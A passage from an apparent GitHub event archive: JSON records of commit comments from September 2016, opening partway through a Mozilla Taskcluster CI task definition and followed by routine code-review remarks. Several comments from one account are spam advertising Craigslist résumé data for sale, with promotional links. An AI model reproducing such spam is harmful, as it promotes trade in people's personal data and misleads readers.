\\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:25.157Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:25.157Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"d8kWcqh7RUWXCSxXeYAuNA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:25.157Z\\\"\\n}\\n  time:     2016-09-29T20:07:25.313Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"Icjwv4xxQLmHdaNxdoEekw\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Doc\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"docs\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"b205285d4b5904a59d53107ec8c423eb1890725d\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Documentation Build Test\",\n                        \"description\": \"Documentation Build Test\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-29T20:07:25.157Z\",\n                    \"deadline\": \"2016-09-30T20:07:25.157Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"d8kWcqh7RUWXCSxXeYAuNA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-30T20:07:25.157Z\"\n                },\n                \"time\": \"2016-09-29T20:07:25.313Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-29T20:07:25Z"}
{"id":"4639631914","type":"CommitCommentEvent","actor":{"login":"kwierman"},"repo":{"name":"CenterForOpenScience/osf.io"},"payload":{"comment":{"id":19230137,"position":null,"line":null,"path":null,"commit_id":"a15e004611bd390a9a2d63c07d9f17e7bb81b9b5","created_at":"2016-09-29T20:07:28Z","updated_at":"2016-09-29T20:07:28Z","body":"Just out of curiosity, where does this list of providers come into play?"}},"created_at":"2016-09-29T20:07:28Z"}
{"id":"4639633048","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19230140,"position":null,"line":null,"path":null,"commit_id":"9d02b80b3b20c48c73a4050aca534f46841485e8","created_at":"2016-09-29T20:07:40Z","updated_at":"2016-09-29T20:07:40Z","body":"In case of stonewalls, like Black d5 e6 f5, it is quite likely White will have a pawn on d4 or e5\r\nThis will make the pawn e6 a backward, so this Unsupported penalty will not be triggered."}},"created_at":"2016-09-29T20:07:40Z"}
{"id":"4639634895","type":"CommitCommentEvent","actor":{"login":"signalpoint"},"repo":{"name":"devasghar/DrupalGap"},"payload":{"comment":{"id":19230143,"position":5,"line":176,"path":"src/modules/entity/entity.js","commit_id":"a831b5c3f9698f78ef3731d8b84a295e7074f52e","created_at":"2016-09-29T20:08:00Z","updated_at":"2016-09-29T20:08:00Z","body":"AFAIK, we need the `entity[field_name]` otherwise JavaScript will crash when loading an older entity that doesn't yet have any data for a field added to the bundle after the last entity update."}},"created_at":"2016-09-29T20:08:00Z"}
{"id":"4639635979","type":"CommitCommentEvent","actor":{"login":"VampyrBytes"},"repo":{"name":"ParadiseSS13/Paradise"},"payload":{"comment":{"id":19230146,"position":6,"line":197,"path":"code/modules/mob/living/carbon/human/human.dm","commit_id":"d0db8c9bffdae1857c3ae79448bdc8aca886b867","created_at":"2016-09-29T20:08:09Z","updated_at":"2016-09-29T20:08:09Z","body":"Sorry, locate doesn't return true or false so that's not right. I'm sure there must be a nicer way of doing it than the double negative but it's been a very long day so I can't figure it out right now, I'll let someone else have a look"}},"created_at":"2016-09-29T20:08:09Z"}
{"id":"4639645489","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19230171,"position":null,"line":null,"path":null,"commit_id":"db2663613cfee0f2440cf71c8a12e89ef50cc6ab","created_at":"2016-09-29T20:09:49Z","updated_at":"2016-09-29T20:09:49Z","body":"OK. This commit to be reverted. Spell-casting with|on hypnotized stack need numerous fixes anyway."}},"created_at":"2016-09-29T20:09:49Z"}
{"id":"4639648581","type":"CommitCommentEvent","actor":{"login":"wholesalers-craigslistleads"},"repo":{"name":"wholesalers-craigslistleads/craigslist.resume"},"payload":{"comment":{"id":19230181,"position":1,"line":1,"path":"index.html","commit_id":"d9e76ba988dccd48961440cac0f63bc83fde9656","created_at":"2016-09-29T20:10:23Z","updated_at":"2016-09-29T20:10:23Z","body":"USA CRAIGSLIST RESUME AVAILABLE FOR SALE  NOW !!!"}},"created_at":"2016-09-29T20:10:23Z"}
{"id":"4639649458","type":"CommitCommentEvent","actor":{"login":"julien2512"},"repo":{"name":"OSGeo/proj.4"},"payload":{"comment":{"id":19230186,"position":null,"line":null,"path":null,"commit_id":"82ebdca204029604aaa35b124b5b1c660b46ad42","created_at":"2016-09-29T20:10:33Z","updated_at":"2016-09-29T20:10:33Z","body":"fair enough !"}},"created_at":"2016-09-29T20:10:33Z"}
{"id":"4639650975","type":"CommitCommentEvent","actor":{"login":"wholesalers-craigslistleads"},"repo":{"name":"wholesalers-craigslistleads/craigslist.resume"},"payload":{"comment":{"id":19230191,"position":2,"line":2,"path":"index.html","commit_id":"d9e76ba988dccd48961440cac0f63bc83fde9656","created_at":"2016-09-29T20:10:50Z","updated_at":"2016-09-29T20:10:50Z","body":"https://plus.google.com/u/0/105711555824164642787"}},"created_at":"2016-09-29T20:10:50Z"}
{"id":"4639652685","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":19230193,"position":null,"line":null,"path":null,"commit_id":"894def07d56bc451be8dde5cae313e76290c7bc0","created_at":"2016-09-29T20:11:09Z","updated_at":"2016-09-29T20:11:09Z","body":"@teschnei I don't understand why you needed to split this, the onEnage one should still run when they spawn because they are set aggressive to the person spawning. "}},"created_at":"2016-09-29T20:11:09Z"}
{"id":"4639653258","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"cs50/help50"},"payload":{"comment":{"id":19230194,"position":null,"line":null,"path":null,"commit_id":"f6532db9785bbc2ddf1fd02cbed5b3c9f82c988b","created_at":"2016-09-29T20:11:16Z","updated_at":"2016-09-29T20:11:16Z","body":"fyi, @brianyu28, @coltonoscopy, no longer necessary to specify `APP_URL=` on command line when testing in dev."}},"created_at":"2016-09-29T20:11:16Z"}
{"id":"4639654297","type":"CommitCommentEvent","actor":{"login":"wholesalers-craigslistleads"},"repo":{"name":"wholesalers-craigslistleads/craigslist.resume"},"payload":{"comment":{"id":19230196,"position":3,"line":3,"path":"index.html","commit_id":"d9e76ba988dccd48961440cac0f63bc83fde9656","created_at":"2016-09-29T20:11:28Z","updated_at":"2016-09-29T20:11:28Z","body":"wholesalers craigslist.resume"}},"created_at":"2016-09-29T20:11:28Z"}
{"id":"4639657098","type":"CommitCommentEvent","actor":{"login":"Tuuleh"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":19230203,"position":2,"line":2,"path":"app/services/auth_token_verifier.rb","commit_id":"c147ac6652f3cab2b2acafcf2873172ba65c5477","created_at":"2016-09-29T20:12:01Z","updated_at":"2016-09-29T20:12:01Z","body":"@osahyoun was this really so bad that this much refactoring was warranted? You also changed the checking logic. You only check that the token exists, not that it's associated with a member. I will have to add logic back to get the member, since I need to update them on AK. + Why are we no longer logging errors anywhere?"}},"created_at":"2016-09-29T20:12:01Z"}
{"id":"4639666965","type":"CommitCommentEvent","actor":{"login":"gillespilon"},"repo":{"name":"gillespilon/hello-world"},"payload":{"comment":{"id":19230230,"position":null,"line":null,"path":null,"commit_id":"b42e1885183032fe3ed26bda828a94bde3eba476","created_at":"2016-09-29T20:13:47Z","updated_at":"2016-09-29T20:13:47Z","body":"Add one line for the first commit."}},"created_at":"2016-09-29T20:13:47Z"}
{"id":"4639667105","type":"CommitCommentEvent","actor":{"login":"blacky0x0"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19230232,"position":125,"line":225,"path":"src/main/java/com/github/dzieciou/testing/curl/Http2Curl.java","commit_id":"8c420a0c82e84787cca5a91bab2da2f7ea9e8415","created_at":"2016-09-29T20:13:49Z","updated_at":"2016-09-29T20:13:49Z","body":"According section https://tools.ietf.org/html/rfc6265#section-4.1.1 we have many cookie-pairs but also we have other single parameters like \"Secure\" and \"HttpOnly\" in general syntax. \r\nWiki: \r\n> The Secure and HttpOnly attributes do not have associated values. \r\n\r\nExample of cookie https://gist.github.com/jamesyang124/7e81767b6248dd870c3a\r\n> Set-Cookie: SID=31d4d96e407aad42; Path=/; Secure; HttpOnly\r\n\r\nI think it will be a good way to check second parameter for null value. Cause we couldn't rely on the one who generates the cookie."}},"created_at":"2016-09-29T20:13:49Z"}
{"id":"4639668483","type":"CommitCommentEvent","actor":{"login":"almesh"},"repo":{"name":"gitterHQ/gitter-translations"},"payload":{"comment":{"id":19230237,"position":null,"line":null,"path":null,"commit_id":"4c83052ee81b757fa62a2b8a2d14431856c684eb","created_at":"2016-09-29T20:14:04Z","updated_at":"2016-09-29T20:14:04Z","body":"4c83052"}},"created_at":"2016-09-29T20:14:04Z"}
{"id":"4639668636","type":"CommitCommentEvent","actor":{"login":"revolter"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19230238,"position":4,"line":42,"path":"src/DbStructureModel.cpp","commit_id":"8be2c54f51f174e1bf9e728e41f28d5a95b2cdb4","created_at":"2016-09-29T20:14:06Z","updated_at":"2016-09-29T20:14:06Z","body":"Couldn't this be combined with the next `else if`? Or better yet, replace all of this with a `switch` with one fall-through."}},"created_at":"2016-09-29T20:14:06Z"}
{"id":"4639669232","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19230241,"position":8,"line":37,"path":"libsepol/src/Makefile","commit_id":"b9bae9fae84426c6fccfa51891cf33a39d2f53f6","created_at":"2016-09-29T20:14:12Z","updated_at":"2016-09-29T20:14:12Z","body":"This comment seems obsolete.  Do we need this change at all?"}},"created_at":"2016-09-29T20:14:12Z"}
{"id":"4639672892","type":"CommitCommentEvent","actor":{"login":"iqbal-lab"},"repo":{"name":"rmnorris/pandora"},"payload":{"comment":{"id":19230249,"position":null,"line":null,"path":null,"commit_id":"93f0737e82b8b6f1df13eb8d30f123ad0eeb10a3","created_at":"2016-09-29T20:14:52Z","updated_at":"2016-09-29T20:14:52Z","body":"Also passes with valgrind @rmnorris "}},"created_at":"2016-09-29T20:14:52Z"}
{"id":"4639673335","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19230251,"position":null,"line":null,"path":null,"commit_id":"78ebf17608b9012916585db8e8166694f44960f8","created_at":"2016-09-29T20:14:57Z","updated_at":"2016-09-29T20:14:57Z","body":"Good."}},"created_at":"2016-09-29T20:14:57Z"}
{"id":"4639676638","type":"CommitCommentEvent","actor":{"login":"mfraezz"},"repo":{"name":"CenterForOpenScience/osf.io"},"payload":{"comment":{"id":19230255,"position":null,"line":null,"path":null,"commit_id":"a15e004611bd390a9a2d63c07d9f17e7bb81b9b5","created_at":"2016-09-29T20:15:34Z","updated_at":"2016-09-29T20:15:34Z","body":"When sending notification emails for events users are subscribed to. Specifically, when comments are added to files."}},"created_at":"2016-09-29T20:15:34Z"}
{"id":"4639677804","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19230256,"position":4,"line":687,"path":"translations/messages-en.properties","commit_id":"eccaae2055f094778b7e3be68776b6bb1ba1c16a","created_at":"2016-09-29T20:15:47Z","updated_at":"2016-09-29T20:15:47Z","body":"We already have a `No reports found` key which is used when there are no reports in the Reports tab LHS. Maybe use the same key for consistency? They're both used for the same thing."}},"created_at":"2016-09-29T20:15:47Z"}
{"id":"4639680764","type":"CommitCommentEvent","actor":{"login":"carlphilipp"},"repo":{"name":"corelema/Rainbow"},"payload":{"comment":{"id":19230271,"position":8,"line":6,"path":"gradle/wrapper/gradle-wrapper.properties","commit_id":"de3fc6900120a5fe9d7c1d56c18252916229e75f","created_at":"2016-09-29T20:16:20Z","updated_at":"2016-09-29T20:16:20Z","body":"You can push to 3.1 :)"}},"created_at":"2016-09-29T20:16:20Z"}
{"id":"4639684439","type":"CommitCommentEvent","actor":{"login":"jennybc"},"repo":{"name":"STAT545-UBC/STAT545-UBC.github.io"},"payload":{"comment":{"id":19230286,"position":86,"line":73,"path":"block010_dplyr-end-single-table.rmd","commit_id":"18554c25b60cc63bc881ab4718d89353369bc4ca","created_at":"2016-09-29T20:16:58Z","updated_at":"2016-09-29T20:16:58Z","body":"@samhinshaw Will you open that as an issue? That is easy enough for me to change. I wondered what was going on."}},"created_at":"2016-09-29T20:16:58Z"}
{"id":"4639685588","type":"CommitCommentEvent","actor":{"login":"mkhomutov"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":19230287,"position":17,"line":167,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/ColorLegend/Controls/ColorLegend.cs","commit_id":"4c8c805d0de510a9a7e6115038dc7c83f1a30816","created_at":"2016-09-29T20:17:10Z","updated_at":"2016-09-29T20:17:10Z","body":"replace \"ShowSettingsBox\" to \"ShowSettings\" instead of renaming property ShowSettings to ShowSettingsBox\r\n"}},"created_at":"2016-09-29T20:17:10Z"}
{"id":"4639686497","type":"CommitCommentEvent","actor":{"login":"rubengees"},"repo":{"name":"proxer/ProxerLibAndroid"},"payload":{"comment":{"id":19230288,"position":null,"line":null,"path":null,"commit_id":"6ca7612e584355af6db0bf4a55838997af70b3bd","created_at":"2016-09-29T20:17:20Z","updated_at":"2016-09-29T20:17:20Z","body":"Well, in that case we *want* an `Exception` to be thrown, as the result is not valid.\r\nIf everything is fine, I'll make a release^^"}},"created_at":"2016-09-29T20:17:20Z"}
{"id":"4639697290","type":"CommitCommentEvent","actor":{"login":"wholesalers-craigslistleads"},"repo":{"name":"wholesalers-craigslistleads/craigslist.resume"},"payload":{"comment":{"id":19230314,"position":4,"line":4,"path":"index.html","commit_id":"d9e76ba988dccd48961440cac0f63bc83fde9656","created_at":"2016-09-29T20:19:13Z","updated_at":"2016-09-29T20:19:13Z","body":"https://wholesalersresume.wordpress.com/"}},"created_at":"2016-09-29T20:19:13Z"}
{"id":"4639699862","type":"CommitCommentEvent","actor":{"login":"wholesalers-craigslistleads"},"repo":{"name":"wholesalers-craigslistleads/craigslist.resume"},"payload":{"comment":{"id":19230323,"position":7,"line":7,"path":"index.html","commit_id":"d9e76ba988dccd48961440cac0f63bc83fde9656","created_at":"2016-09-29T20:19:41Z","updated_at":"2016-09-29T20:19:41Z","body":"https://wholesalersresume.wordpress.com/"}},"created_at":"2016-09-29T20:19:41Z"}
{"id":"4639701956","type":"CommitCommentEvent","actor":{"login":"corelema"},"repo":{"name":"corelema/Rainbow"},"payload":{"comment":{"id":19230327,"position":8,"line":6,"path":"gradle/wrapper/gradle-wrapper.properties","commit_id":"de3fc6900120a5fe9d7c1d56c18252916229e75f","created_at":"2016-09-29T20:20:04Z","updated_at":"2016-09-29T20:20:04Z","body":"Hum, I wonder why Android Studio didn't say it. I didn't really pay attention, was just checking that everything worked fine.\r\nWill do, thanks!"}},"created_at":"2016-09-29T20:20:04Z"}
{"id":"4639702838","type":"CommitCommentEvent","actor":{"login":"andrewpbray"},"repo":{"name":"atoshima/reed-thesis"},"payload":{"comment":{"id":19230332,"position":4,"line":6,"path":"research-log/09-29.md","commit_id":"e9dd27a7d4aa90dc4d93eab80b93381ea1f14b62","created_at":"2016-09-29T20:20:14Z","updated_at":"2016-09-29T20:20:14Z","body":"great! glad you're making progress!"}},"created_at":"2016-09-29T20:20:14Z"}
{"id":"4639703945","type":"CommitCommentEvent","actor":{"login":"MKleusberg"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19230333,"position":4,"line":42,"path":"src/DbStructureModel.cpp","commit_id":"8be2c54f51f174e1bf9e728e41f28d5a95b2cdb4","created_at":"2016-09-29T20:20:24Z","updated_at":"2016-09-29T20:20:24Z","body":"You're completely right of course! :smiley: Just pushed a commit which simplifies the code here. Thanks for pointing this out - I was only looking at the one line of code I was working on :wink: "}},"created_at":"2016-09-29T20:20:24Z"}
{"id":"4639704327","type":"CommitCommentEvent","actor":{"login":"ericlindley-g"},"repo":{"name":"ampproject/docs"},"payload":{"comment":{"id":19230334,"position":null,"line":null,"path":null,"commit_id":"056a3d89f346c301ca2c4a81d2130523684bae8c","created_at":"2016-09-29T20:20:28Z","updated_at":"2016-09-29T20:20:28Z","body":"LGTM (though I defer to @zhouyx, who is more familiar with the behavior, for approval)"}},"created_at":"2016-09-29T20:20:28Z"}
{"id":"4639705857","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"BigNoid/Aeon-Nox"},"payload":{"comment":{"id":19230337,"position":5,"line":582,"path":"1080i/Includes_Widgets.xml","commit_id":"f165eb3ef1c665e7fbe82476c46e8dbbc42c4d69","created_at":"2016-09-29T20:20:45Z","updated_at":"2016-09-29T20:20:45Z","body":"@BigNoid Two content targets?"}},"created_at":"2016-09-29T20:20:45Z"}
{"id":"4639710517","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19230345,"position":49,"line":50,"path":"libselinux/utils/Makefile","commit_id":"74d3ab4d297a59b6d972edff6fa1997a51f37f4f","created_at":"2016-09-29T20:21:39Z","updated_at":"2016-09-29T20:21:39Z","body":"Where is MAC_LDFLAGS defined?"}},"created_at":"2016-09-29T20:21:39Z"}
{"id":"4639711847","type":"CommitCommentEvent","actor":{"login":"BigNoid"},"repo":{"name":"BigNoid/Aeon-Nox"},"payload":{"comment":{"id":19230348,"position":5,"line":582,"path":"1080i/Includes_Widgets.xml","commit_id":"f165eb3ef1c665e7fbe82476c46e8dbbc42c4d69","created_at":"2016-09-29T20:21:53Z","updated_at":"2016-09-29T20:21:53Z","body":"Oops that was testing code"}},"created_at":"2016-09-29T20:21:53Z"}
{"id":"4639716174","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19230366,"position":null,"line":null,"path":null,"commit_id":"74d3ab4d297a59b6d972edff6fa1997a51f37f4f","created_at":"2016-09-29T20:22:39Z","updated_at":"2016-09-29T20:22:39Z","body":"commit message still says to build with DISABLE_CIL=y.\r\nAlso, the instructions in your RFC were clearer than the commit message:\r\n1. Build libsepol (assumes at root of tree)\r\n    a,  cd libsepol\r\n    b. make\r\n2. Build libselinux\r\n    a. cd libselinux (assumes at root of tree)\r\n    b. make ANDROID_HOST=y"}},"created_at":"2016-09-29T20:22:39Z"}
{"id":"4639718506","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19230382,"position":null,"line":null,"path":null,"commit_id":"9d02b80b3b20c48c73a4050aca534f46841485e8","created_at":"2016-09-29T20:23:04Z","updated_at":"2016-09-29T20:23:04Z","body":"@Rocky640 \r\n\r\nHmm, right. Now I know a reason why I don't like the two else clauses in lines 162 and 165 of pawns.cpp : they make it more difficult to reason about the code (the Unsupported penalty doesn't mean unsupported, but means unsupported-but-not-backwards). I think I would prefer if the lines 159, 162 and 165 where independent of each others, without branching, because that would give commutativity and ease of generalization of the penalties.\r\n\r\n@Stefano80 \r\n\r\nGood luck with your tests :)\r\n"}},"created_at":"2016-09-29T20:23:04Z"}
{"id":"4639721234","type":"CommitCommentEvent","actor":{"login":"CaioFreire"},"repo":{"name":"CaioFreire/CUB"},"payload":{"comment":{"id":19230394,"position":null,"line":null,"path":null,"commit_id":"482145f20c9331b282dfb9f36f86724162d738d8","created_at":"2016-09-29T20:23:34Z","updated_at":"2016-09-29T20:23:34Z","body":"CAI value for each codon"}},"created_at":"2016-09-29T20:23:34Z"}
{"id":"4639723376","type":"CommitCommentEvent","actor":{"login":"revolter"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19230399,"position":4,"line":42,"path":"src/DbStructureModel.cpp","commit_id":"8be2c54f51f174e1bf9e728e41f28d5a95b2cdb4","created_at":"2016-09-29T20:23:56Z","updated_at":"2016-09-29T20:23:56Z","body":"Yeah, I saw that. You were pretty fast 😲."}},"created_at":"2016-09-29T20:23:56Z"}
{"id":"4639724851","type":"CommitCommentEvent","actor":{"login":"Weicheng1993"},"repo":{"name":"Zhouenze/DBPr"},"payload":{"comment":{"id":19230405,"position":null,"line":null,"path":null,"commit_id":"c5cee559c6548127940f76441b0a9cb13a9486ac","created_at":"2016-09-29T20:24:11Z","updated_at":"2016-09-29T20:24:11Z","body":"Distinct finished"}},"created_at":"2016-09-29T20:24:11Z"}
{"id":"4639727181","type":"CommitCommentEvent","actor":{"login":"BigNoid"},"repo":{"name":"BigNoid/Aeon-Nox"},"payload":{"comment":{"id":19230413,"position":5,"line":582,"path":"1080i/Includes_Widgets.xml","commit_id":"f165eb3ef1c665e7fbe82476c46e8dbbc42c4d69","created_at":"2016-09-29T20:24:32Z","updated_at":"2016-09-29T20:24:32Z","body":"Oh and bluetooth menu is still WIP as I am still waiting on my Pi3"}},"created_at":"2016-09-29T20:24:32Z"}
